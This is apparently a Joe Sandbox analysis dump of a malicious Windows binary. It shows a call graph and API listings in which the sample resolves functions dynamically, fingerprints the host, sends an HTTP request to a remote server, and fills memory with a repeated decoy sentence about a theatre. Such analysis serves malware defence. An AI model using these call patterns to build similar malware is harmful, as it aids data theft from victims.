38296 e14610 2 API calls 38295->38296 38297 e13e5b 38296->38297 38298 e14610 2 API calls 38297->38298 38299 e13e74 38298->38299 38300 e14610 2 API calls 38299->38300 38301 e13e8d 38300->38301 38302 e14610 2 API calls 38301->38302 38303 e13ea6 38302->38303 38304 e14610 2 API calls 38303->38304 38305 e13ebf 38304->38305 38306 e14610 2 API calls 38305->38306 38307 e13ed8 38306->38307 38308 e14610 2 API calls 38307->38308 38309 e13ef1 38308->38309 38310 e14610 2 API calls 38309->38310 38311 e13f0a 38310->38311 38312 e14610 2 API calls 38311->38312 38313 e13f23 38312->38313 38314 e14610 2 API calls 38313->38314 38315 e13f3c 38314->38315 38316 e14610 2 API calls 38315->38316 38317 e13f55 38316->38317 38318 e14610 2 API calls 38317->38318 38319 e13f6e 38318->38319 38320 e14610 2 API calls 38319->38320 38321 e13f87 38320->38321 38322 e14610 2 API calls 38321->38322 38323 e13fa0 38322->38323 38324 e14610 2 API calls 38323->38324 38325 e13fb9 38324->38325 38326 e14610 2 API calls 38325->38326 38327 e13fd2 38326->38327 38328 e14610 2 API calls 38327->38328 38329 e13feb 38328->38329 38330 e14610 2 API calls 38329->38330 38331 e14004 38330->38331 38332 e14610 2 API calls 38331->38332 38333 e1401d 38332->38333 38334 e14610 2 API calls 38333->38334 38335 e14036 38334->38335 38336 e14610 2 API calls 38335->38336 38337 e1404f 38336->38337 38338 e14610 2 API calls 38337->38338 38339 e14068 38338->38339 38340 e14610 2 API calls 38339->38340 38341 e14081 38340->38341 38342 e14610 2 API calls 38341->38342 38343 e1409a 38342->38343 38344 e14610 2 API calls 38343->38344 38345 e140b3 38344->38345 38346 e14610 2 API calls 38345->38346 38347 e140cc 38346->38347 38348 e14610 2 API calls 38347->38348 38349 e140e5 38348->38349 38350 e14610 2 API calls 38349->38350 38351 e140fe 38350->38351 38352 e14610 2 API calls 38351->38352 38353 e14117 38352->38353 38354 e14610 2 API calls 38353->38354 38355 e14130 38354->38355 38356 e14610 2 API calls 38355->38356 38357 e14149 38356->38357 38358 e14610 2 API calls 38357->38358 38359 e14162 38358->38359 38360 e14610 2 API calls 38359->38360 38361 e1417b 38360->38361 38362 e14610 2 API calls 38361->38362 38363 e14194 38362->38363 38364 e14610 2 API calls 38363->38364 38365 e141ad 38364->38365 38366 e14610 2 API calls 38365->38366 38367 e141c6 38366->38367 38368 e14610 2 API calls 38367->38368 38369 e141df 38368->38369 38370 e14610 2 API calls 38369->38370 38371 e141f8 38370->38371 38372 e14610 2 API calls 38371->38372 38373 e14211 38372->38373 38374 e14610 2 API calls 38373->38374 38375 e1422a 38374->38375 38376 e14610 2 API calls 38375->38376 38377 e14243 38376->38377 38378 e14610 2 API calls 38377->38378 38379 e1425c 38378->38379 38380 e14610 2 API calls 38379->38380 38381 e14275 38380->38381 38382 e14610 2 API calls 38381->38382 38383 e1428e 38382->38383 38384 e14610 2 API calls 38383->38384 38385 e142a7 38384->38385 38386 e14610 2 API calls 38385->38386 38387 e142c0 38386->38387 38388 e14610 2 API calls 38387->38388 38389 e142d9 38388->38389 38390 e14610 2 API calls 38389->38390 38391 e142f2 38390->38391 38392 e14610 2 API calls 38391->38392 38393 e1430b 38392->38393 38394 e14610 2 API calls 38393->38394 38395 e14324 38394->38395 38396 e14610 2 API calls 38395->38396 38397 e1433d 38396->38397 38398 e14610 2 API calls 38397->38398 38399 e14356 38398->38399 38400 e14610 2 API calls 38399->38400 38401 e1436f 38400->38401 38402 e14610 2 API calls 38401->38402 38403 e14388 38402->38403 38404 e14610 2 API calls 38403->38404 38405 e143a1 38404->38405 38406 e14610 2 API calls 38405->38406 38407 e143ba 38406->38407 38408 e14610 2 API calls 38407->38408 38409 e143d3 38408->38409 38410 e14610 2 API calls 38409->38410 38411 e143ec 38410->38411 38412 e14610 2 API calls 38411->38412 38413 e14405 38412->38413 38414 e14610 2 API calls 38413->38414 38415 e1441e 38414->38415 38416 e14610 2 API calls 38415->38416 38417 e14437 38416->38417 38418 e14610 2 API calls 38417->38418 38419 e14450 38418->38419 38420 e14610 2 API calls 38419->38420 38421 e14469 38420->38421 38422 e14610 2 API calls 38421->38422 38423 e14482 38422->38423 38424 e14610 2 API calls 38423->38424 38425 e1449b 38424->38425 38426 e14610 2 API calls 38425->38426 38427 e144b4 38426->38427 38428 e14610 2 API calls 38427->38428 38429 e144cd 38428->38429 38430 e14610 2 API calls 38429->38430 38431 e144e6 38430->38431 38432 e14610 2 API calls 38431->38432 38433 e144ff 38432->38433 38434 e14610 2 API calls 38433->38434 38435 e14518 38434->38435 38436 e14610 2 API calls 38435->38436 38437 e14531 38436->38437 38438 e14610 2 API calls 38437->38438 38439 e1454a 38438->38439 38440 e14610 2 API calls 38439->38440 38441 e14563 38440->38441 38442 e14610 2 API calls 38441->38442 38443 e1457c 38442->38443 38444 e14610 2 API calls 38443->38444 38445 e14595 38444->38445 38446 e14610 2 API calls 38445->38446 38447 e145ae 38446->38447 38448 e14610 2 API calls 38447->38448 38449 e145c7 38448->38449 38450 e14610 2 API calls 38449->38450 38451 e145e0 38450->38451 38452 e14610 2 API calls 38451->38452 38453 e145f9 38452->38453 38454 e29f20 38453->38454 38455 e29f30 43 API calls 38454->38455 38456 e2a346 8 API calls 38454->38456 38455->38456 38457 e2a456 38456->38457 38458 e2a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38456->38458 38459 e2a463 8 API calls 38457->38459 38460 e2a526 38457->38460 38458->38457 38459->38460 38461 e2a5a8 38460->38461 38462 e2a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38460->38462 38463 e2a647 38461->38463 38464 e2a5b5 6 API calls 38461->38464 38462->38461 38465 e2a654 9 API calls 38463->38465 38466 e2a72f 38463->38466 38464->38463 38465->38466 38467 e2a7b2 38466->38467 38468 e2a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38466->38468 38469 e2a7bb GetProcAddress GetProcAddress 38467->38469 38470 e2a7ec 38467->38470 38468->38467 38469->38470 38471 e2a825 38470->38471 38472 e2a7f5 GetProcAddress GetProcAddress 38470->38472 38473 e2a922 38471->38473 38474 e2a832 10 API calls 38471->38474 38472->38471 38475 e2a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38473->38475 38476 e2a98d 38473->38476 38474->38473 38475->38476 38477 e2a996 GetProcAddress 38476->38477 38478 e2a9ae 38476->38478 38477->38478 38479 e2a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38478->38479 38480 e25ef3 38478->38480 38479->38480 38481 e11590 38480->38481 38751 e116b0 38481->38751 38484 e2aab0 lstrcpy 38485 e115b5 38484->38485 38486 e2aab0 lstrcpy 38485->38486 38487 e115c7 38486->38487 38488 e2aab0 lstrcpy 38487->38488 38489 e115d9 38488->38489 38490 e2aab0 lstrcpy 38489->38490 38491 e11663 38490->38491 38492 e25760 38491->38492 38493 e25771 38492->38493 38494 e2ab30 2 API calls 38493->38494 38495 e2577e 38494->38495 38496 e2ab30 2 API calls 38495->38496 38497 e2578b 38496->38497 38498 e2ab30 2 API calls 38497->38498 38499 e25798 38498->38499 38500 e2aa50 lstrcpy 38499->38500 38501 e257a5 38500->38501 38502 e2aa50 lstrcpy 38501->38502 38503 e257b2 38502->38503 38504 e2aa50 lstrcpy 38503->38504 38505 e257bf 38504->38505 38506 e2aa50 lstrcpy 38505->38506 38525 e257cc 38506->38525 38507 e25893 StrCmpCA 38507->38525 38508 e258f0 StrCmpCA 38509 e25a2c 38508->38509 38508->38525 38510 e2abb0 lstrcpy 38509->38510 38512 e25a38 38510->38512 38511 e11590 lstrcpy 38511->38525 38514 e2ab30 2 API calls 38512->38514 38513 e2ab30 lstrlen lstrcpy 38513->38525 38516 e25a46 38514->38516 38515 e25aa6 StrCmpCA 38517 e25be1 38515->38517 38515->38525 38520 e2ab30 2 API calls 38516->38520 38522 e2abb0 lstrcpy 38517->38522 38518 e2aa50 lstrcpy 38518->38525 38519 e2aab0 lstrcpy 38519->38525 38521 e25a55 38520->38521 38523 e116b0 lstrcpy 38521->38523 38524 e25bed 38522->38524 38546 e25a61 38523->38546 38526 e2ab30 2 API calls 38524->38526 38525->38507 38525->38508 38525->38511 38525->38513 38525->38515 38525->38518 38525->38519 38527 e25c5b StrCmpCA 38525->38527 38528 e25440 20 API calls 38525->38528 38535 e2abb0 lstrcpy 38525->38535 38540 e25510 25 API calls 38525->38540 38543 e259da StrCmpCA 38525->38543 38545 e25b8f StrCmpCA 38525->38545 38529 e25bfb 38526->38529 38531 e25c66 Sleep 38527->38531 38532 e25c78 38527->38532 38528->38525 38530 e2ab30 2 API calls 38529->38530 38533 e25c0a 38530->38533 38531->38525 38534 e2abb0 lstrcpy 38532->38534 38536 e116b0 lstrcpy 38533->38536 38537 e25c84 38534->38537 38535->38525 38536->38546 38538 e2ab30 2 API calls 38537->38538 38539 e25c93 38538->38539 38541 e2ab30 2 API calls 38539->38541 38540->38525 38542 e25ca2 38541->38542 38544 e116b0 lstrcpy 38542->38544 38543->38525 38544->38546 38545->38525 38546->37599 38548 e276e3 GetVolumeInformationA 38547->38548 38549 e276dc 38547->38549 38550 e27721 38548->38550 38549->38548 38551 e2778c GetProcessHeap RtlAllocateHeap 38550->38551 38552 e277b8 wsprintfA 38551->38552 38553 e277a9 38551->38553 38555 e2aa50 lstrcpy 38552->38555 38554 e2aa50 lstrcpy 38553->38554 38556 e25ff7 38554->38556 38555->38556 38556->37620 38558 e2aab0 lstrcpy 38557->38558 38559 e148e9 38558->38559 38760 e14800 38559->38760 38561 e148f5 38562 e2aa50 lstrcpy 38561->38562 38563 e14927 38562->38563 38564 e2aa50 lstrcpy 38563->38564 38565 e14934 38564->38565 38566 e2aa50 lstrcpy 38565->38566 38567 e14941 38566->38567 38568 e2aa50 lstrcpy 38567->38568 38569 e1494e 38568->38569 38570 e2aa50 lstrcpy 38569->38570 38571 e1495b InternetOpenA StrCmpCA 38570->38571 38572 e14994 38571->38572 38573 e14f1b InternetCloseHandle 38572->38573 38766 e28cf0 38572->38766 38575 e14f38 38573->38575 38781 e1a210 CryptStringToBinaryA 38575->38781 38576 e149b3 38774 e2ac30 38576->38774 38580 e149c6 38581 e2abb0 lstrcpy 38580->38581 38586 e149cf 38581->38586 38582 e2ab30 2 API calls 38583 e14f55 38582->38583 38584 e2acc0 4 API calls 38583->38584 38587 e14f6b 38584->38587 38585 e14f77 ctype 38588 e2aab0 lstrcpy 38585->38588 38590 e2acc0 4 API calls 38586->38590 38589 e2abb0 lstrcpy 38587->38589 38601 e14fa7 38588->38601 38589->38585 38591 e149f9 38590->38591 38592 e2abb0 lstrcpy 38591->38592 38593 e14a02 38592->38593 38594 e2acc0 4 API calls 38593->38594 38595 e14a21 38594->38595 38596 e2abb0 lstrcpy 38595->38596 38597 e14a2a 38596->38597 38598 e2ac30 3 API calls 38597->38598 38599 e14a48 38598->38599 38600 e2abb0 lstrcpy 38599->38600 38602 e14a51 38600->38602 38601->37623 38603 e2acc0 4 API calls 38602->38603 38604 e14a70 38603->38604 38605 e2abb0 lstrcpy 38604->38605 38606 e14a79 38605->38606 38607 e2acc0 4 API calls 38606->38607 38608 e14a98 38607->38608 38609 e2abb0 lstrcpy 38608->38609 38610 e14aa1 38609->38610 38611 e2acc0 4 API calls 38610->38611 38612 e14acd 38611->38612 38613 e2ac30 3 API calls 38612->38613 38614 e14ad4 38613->38614 38615 e2abb0 lstrcpy 38614->38615 38616 e14add 38615->38616 38617 e14af3 InternetConnectA 38616->38617 38617->38573 38618 e14b23 HttpOpenRequestA 38617->38618 38620 e14b78 38618->38620 38621 e14f0e InternetCloseHandle 38618->38621 38622 e2acc0 4 API calls 38620->38622 38621->38573 38623 e14b8c 38622->38623 38624 e2abb0 lstrcpy 38623->38624 38625 e14b95 38624->38625 38626 e2ac30 3 API calls 38625->38626 38627 e14bb3 38626->38627 38628 e2abb0 lstrcpy 38627->38628 38629 e14bbc 38628->38629 38630 e2acc0 4 API calls 38629->38630 38631 e14bdb 38630->38631 38632 e2abb0 lstrcpy 38631->38632 38633 e14be4 38632->38633 38634 e2acc0 4 API calls 38633->38634 38635 e14c05 38634->38635 38636 e2abb0 lstrcpy 38635->38636 38637 e14c0e 38636->38637 38638 e2acc0 4 API calls 38637->38638 38639 e14c2e 38638->38639 38640 e2abb0 lstrcpy 38639->38640 38641 e14c37 38640->38641 38642 e2acc0 4 API calls 38641->38642 38643 e14c56 38642->38643 38644 e2abb0 lstrcpy 38643->38644 38645 e14c5f 38644->38645 38646 e2ac30 3 API calls 38645->38646 38647 e14c7d 38646->38647 38648 e2abb0 lstrcpy 38647->38648 38649 e14c86 38648->38649 38650 e2acc0 4 API calls 38649->38650 38651 e14ca5 38650->38651 38652 e2abb0 lstrcpy 38651->38652 38653 e14cae 38652->38653 38654 e2acc0 4 API calls 38653->38654 38655 e14ccd 38654->38655 38656 e2abb0 lstrcpy 38655->38656 38657 e14cd6 38656->38657 38658 e2ac30 3 API calls 38657->38658 38659 e14cf4 38658->38659 38660 e2abb0 lstrcpy 38659->38660 38661 e14cfd 38660->38661 38662 e2acc0 4 API calls 38661->38662 38663 e14d1c 38662->38663 38664 e2abb0 lstrcpy 38663->38664 38665 e14d25 38664->38665 38666 e2acc0 4 API calls 38665->38666 38667 e14d46 38666->38667 38668 e2abb0 lstrcpy 38667->38668 38669 e14d4f 38668->38669 38670 e2acc0 4 API calls 38669->38670 38671 e14d6f 38670->38671 38672 e2abb0 lstrcpy 38671->38672 38673 e14d78 38672->38673 38674 e2acc0 4 API calls 38673->38674 38675 e14d97 38674->38675 38676 e2abb0 lstrcpy 38675->38676 38677 e14da0 38676->38677 38678 e2ac30 3 API calls 38677->38678 38679 e14dbe 38678->38679 38680 e2abb0 lstrcpy 38679->38680 38681 e14dc7 38680->38681 38682 e2aa50 lstrcpy 38681->38682 38683 e14de2 38682->38683 38684 e2ac30 3 API calls 38683->38684 38685 e14e03 38684->38685 38686 e2ac30 3 API calls 38685->38686 38687 e14e0a 38686->38687 38688 e2abb0 lstrcpy 38687->38688 38689 e14e16 38688->38689 38690 e14e37 lstrlen 38689->38690 38691 e14e4a 38690->38691 38692 e14e53 lstrlen 38691->38692 38780 e2ade0 38692->38780 38694 e14e63 HttpSendRequestA 38695 e14e82 InternetReadFile 38694->38695 38696 e14eb7 InternetCloseHandle 38695->38696 38701 e14eae 38695->38701 38699 e2ab10 38696->38699 38698 e2acc0 4 API calls 38698->38701 38699->38621 38700 e2abb0 lstrcpy 38700->38701 38701->38695 38701->38696 38701->38698 38701->38700 38787 e2ade0 38702->38787 38704 e21a14 StrCmpCA 38705 e21a1f ExitProcess 38704->38705 38716 e21a27 38704->38716 38706 e21c12 38706->37625 38707 e21b82 StrCmpCA 38707->38716 38708 e21b63 StrCmpCA 38708->38716 38709 e21bc0 StrCmpCA 38709->38716 38710 e21b41 StrCmpCA 38710->38716 38711 e21ba1 StrCmpCA 38711->38716 38712 e21acf StrCmpCA 38712->38716 38713 e21aad StrCmpCA 38713->38716 38714 e21b1f StrCmpCA 38714->38716 38715 e21afd StrCmpCA 38715->38716 38716->38706 38716->38707 38716->38708 38716->38709 38716->38710 38716->38711 38716->38712 38716->38713 38716->38714 38716->38715 38717 e2ab30 lstrlen lstrcpy 38716->38717 38717->38716 38718->37631 38719->37633 38720->37639 38721->37641 38722->37647 38723->37649 38724->37653 38725->37657 38726->37661 38727->37667 38728->37669 38729->37673 38730->37687 38731->37691 38732->37690 38733->37686 38734->37690 38735->37705 38736->37694 38737->37696 38738->37699 38739->37702 38740->37707 38741->37714 38742->37717 38743->37723 38744->37744 38745->37748 38746->37747 38747->37743 38748->37747 38749->37757 38752 e2aab0 lstrcpy 38751->38752 38753 e116c3 38752->38753 38754 e2aab0 lstrcpy 38753->38754 38755 e116d5 38754->38755 38756 e2aab0 lstrcpy 38755->38756 38757 e116e7 38756->38757 38758 e2aab0 lstrcpy 38757->38758 38759 e115a3 38758->38759 38759->38484 38761 e14816 38760->38761 38762 e14888 lstrlen 38761->38762 38786 e2ade0 38762->38786 38764 e14898 InternetCrackUrlA 38765 e148b7 38764->38765 38765->38561 38767 e2aa50 lstrcpy 38766->38767 38768 e28d04 38767->38768 38769 e2aa50 lstrcpy 38768->38769 38770 e28d12 GetSystemTime 38769->38770 38772 e28d29 38770->38772 38771 e2aab0 lstrcpy 38773 e28d8c 38771->38773 38772->38771 38773->38576 38775 e2ac41 38774->38775 38776 e2ac98 38775->38776 38778 e2ac78 lstrcpy lstrcat 38775->38778 38777 e2aab0 lstrcpy 38776->38777 38779 e2aca4 38777->38779 38778->38776 38779->38580 38780->38694 38782 e1a249 LocalAlloc 38781->38782 38783 e14f3e 38781->38783 38782->38783 38784 e1a264 CryptStringToBinaryA 38782->38784 38783->38582 38783->38585 38784->38783 38785 e1a289 LocalFree 38784->38785 38785->38783 38786->38764 38787->38704

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 e29bb0-e29bc4 call e29aa0 663 e29de3-e29e42 LoadLibraryA * 5 660->663 664 e29bca-e29dde call e29ad0 GetProcAddress * 21 660->664 666 e29e44-e29e58 GetProcAddress 663->666 667 e29e5d-e29e64 663->667 664->663 666->667 669 e29e96-e29e9d 667->669 670 e29e66-e29e91 GetProcAddress * 2 667->670 671 e29eb8-e29ebf 669->671 672 e29e9f-e29eb3 GetProcAddress 669->672 670->669 673 e29ec1-e29ed4 GetProcAddress 671->673 674 e29ed9-e29ee0 671->674 672->671 673->674 675 e29ee2-e29f0c GetProcAddress * 2 674->675 676 e29f11-e29f12 674->676 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01A814B0), ref: 00E29BF1
                                        • GetProcAddress.KERNEL32(77190000,01A81750), ref: 00E29C0A
                                        • GetProcAddress.KERNEL32(77190000,01A81468), ref: 00E29C22
                                        • GetProcAddress.KERNEL32(77190000,01A81588), ref: 00E29C3A
                                        • GetProcAddress.KERNEL32(77190000,01A81498), ref: 00E29C53
                                        • GetProcAddress.KERNEL32(77190000,01A88958), ref: 00E29C6B
                                        • GetProcAddress.KERNEL32(77190000,01A767B8), ref: 00E29C83
                                        • GetProcAddress.KERNEL32(77190000,01A765F8), ref: 00E29C9C
                                        • GetProcAddress.KERNEL32(77190000,01A814E0), ref: 00E29CB4
                                        • GetProcAddress.KERNEL32(77190000,01A815E8), ref: 00E29CCC
                                        • GetProcAddress.KERNEL32(77190000,01A814F8), ref: 00E29CE5
                                        • GetProcAddress.KERNEL32(77190000,01A81510), ref: 00E29CFD
                                        • GetProcAddress.KERNEL32(77190000,01A766F8), ref: 00E29D15
                                        • GetProcAddress.KERNEL32(77190000,01A81540), ref: 00E29D2E
                                        • GetProcAddress.KERNEL32(77190000,01A81600), ref: 00E29D46
                                        • GetProcAddress.KERNEL32(77190000,01A76418), ref: 00E29D5E
                                        • GetProcAddress.KERNEL32(77190000,01A81660), ref: 00E29D77
                                        • GetProcAddress.KERNEL32(77190000,01A81558), ref: 00E29D8F
                                        • GetProcAddress.KERNEL32(77190000,01A76638), ref: 00E29DA7
                                        • GetProcAddress.KERNEL32(77190000,01A817F8), ref: 00E29DC0
                                        • GetProcAddress.KERNEL32(77190000,01A76438), ref: 00E29DD8
                                        • LoadLibraryA.KERNEL32(01A817E0,?,00E26CA0), ref: 00E29DEA
                                        • LoadLibraryA.KERNEL32(01A81780,?,00E26CA0), ref: 00E29DFB
                                        • LoadLibraryA.KERNEL32(01A81798,?,00E26CA0), ref: 00E29E0D
                                        • LoadLibraryA.KERNEL32(01A817B0,?,00E26CA0), ref: 00E29E1F
                                        • LoadLibraryA.KERNEL32(01A817C8,?,00E26CA0), ref: 00E29E30
                                        • GetProcAddress.KERNEL32(76850000,01A81810), ref: 00E29E52
                                        • GetProcAddress.KERNEL32(77040000,01A81828), ref: 00E29E73
                                        • GetProcAddress.KERNEL32(77040000,01A81768), ref: 00E29E8B
                                        • GetProcAddress.KERNEL32(75A10000,01A88E70), ref: 00E29EAD
                                        • GetProcAddress.KERNEL32(75690000,01A76598), ref: 00E29ECE
                                        • GetProcAddress.KERNEL32(776F0000,01A88848), ref: 00E29EEF
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00E29F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00E29EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
                                        • Instruction ID: 61e620cbd6bcf42d5ea61e727802703155ace0e621d587ac5f553a1c3ef92665
                                        • Opcode Fuzzy Hash: f5137ce5bbbfe70aa5c686c35e724ede179a8eeef28a6be828c521fb50bf7a95
                                        • Instruction Fuzzy Hash: 2BA11FB5500200DFC364DFAAF8889567BEAE759F01B10865EF9898B258D73FA541CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 e14610-e146e5 RtlAllocateHeap 781 e146f0-e146f6 764->781 782 e146fc-e1479a 781->782 783 e1479f-e147f9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E1465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E147EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E147CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E146D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E1471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E14643
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
